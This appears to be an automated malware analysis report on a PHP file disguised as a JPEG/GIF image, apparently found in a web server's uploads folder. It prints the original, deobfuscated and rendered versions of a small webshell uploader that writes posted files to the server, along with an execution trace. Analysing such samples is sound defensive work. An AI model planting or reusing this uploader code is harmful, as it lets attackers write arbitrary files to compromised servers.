PHP Malware Analysis
laravelup.php7
md5: 6e7ebbb8faf5d8a3397ca0930a52f85d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Files
- copy (Deobfuscated, HTML, Original)
Input
- _FILES (Deobfuscated, HTML, Original)
- _POST (Deobfuscated, HTML, Original)
Deobfuscated PHP code
�����JFIF���������;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
���C�
���C
����P�P"���� ����������
�������}�!1AQa"q2���#B��R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������� �������
������w�!1AQaq"2�B���� #3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������
��?��"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG��=_�Z�$�i=���7���m#,1�����ר�B�Z~1^t�2:}�O�)��9�\+o6�a ����B�u��W�ףNq�
c�Q�
(�������R�@{��K
�H�uQTW����W{5{�����]���ݮ
_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u
����[����"u�5a�)�_>W�|;�E�"��n�6 �ʼn���oI�eQ^y�E+�Q�1������ڮ�����3W��D�E��%M��=��:�:�0��y�j�(���0�G����@��_�m'��҆>_��e?�ܻ�j����
h��D/�sp�۟�m��.Zf����𥢊���*4��VjX�f��Q��ͻ��e�+�^��F[�ܤ
eͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|���>�Ҽ��d��4���_iz.� >���3WB8�"��\��#p��)���絯iz��
"��?+WEI�MI��ɵo�ڕ�f�)z�����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=<!DOCTYPE html>
<?php
print_r("SH3LLF0UND");
if ($_POST) {
if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
echo "Y";
} else {
echo "N";
}
} else {
echo "\r\n<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";
}Execution traces
data/traces/6e7ebbb8faf5d8a3397ca0930a52f85d_trace-1676262336.5637.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:26:02.461537]
1 0 1 0.000190 393528
1 3 0 0.000236 396128 {main} 1 /var/www/html/uploads/laravelup.php7 0 0
1 3 1 0.000253 396128
0.000280 314240
TRACE END [2023-02-13 02:26:02.461694]
Generated HTML code
<html><head></head><body>����JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
��C
��C
��PP"��
���}!1AQa"q2���#B��R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������
���w!1AQaq"2�B���� #3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������
?�"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG�=_�Z�$�i=���7���m#,1����ר�B�Z~1^t�2:}�O�)��9�\+o6�a ����B�u��W�ףNq�
c�Q�
(������R�@{��K
�H�uQTW����W{5{�����]���ݮ
_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u
����[����"u�5a�)�_>W�|;�E�"��n�6 �ʼn���oI�eQ^y�E+�Q�1������ڮ�����3W��D�E��%M�=��:�:�0��y�j�(���0�G����@��_�m'��҆>_��e?�ܻ�j����
h��D/�sp�۟�m��.Zf����𥢊���*4��VjX�f��Q��ͻ�e�+�^��F[�ܤ
eͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|���>�Ҽ��d��4���_iz.� >���3WB8�"��\��#p��)��絯iz��
"��?+WEI�MI��ɵo�ڕ�f�)z�����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=
<!--? print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"
<form method=post enctype=multipart/form-data--><input type="file" name="0"><input name="0" type="submit" value="up">";}?></body></html>Original PHP code
�����JFIF���������;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
���C�
���C
����P�P"���� ����������
�������}�!1AQa"q2���#B��R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������� �������
������w�!1AQaq"2�B���� #3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������
��?��"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG��=_�Z�$�i=���7���m#,1�����ר�B�Z~1^t�2:}�O�)��9�\+o6�a ����B�u��W�ףNq�
c�Q�
(�������R�@{��K
�H�uQTW����W{5{�����]���ݮ
_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u
����[����"u�5a�)�_>W�|;�E�"��n�6 �ʼn���oI�eQ^y�E+�Q�1������ڮ�����3W��D�E��%M��=��:�:�0��y�j�(���0�G����@��_�m'��҆>_��e?�ܻ�j����
h��D/�sp�۟�m��.Zf����𥢊���*4��VjX�f��Q��ͻ��e�+�^��F[�ܤ
eͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|���>�Ҽ��d��4���_iz.� >���3WB8�"��\��#p��)���絯iz��
"��?+WEI�MI��ɵo�ڕ�f�)z�����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=<!DOCTYPE html>
<? print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"
<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>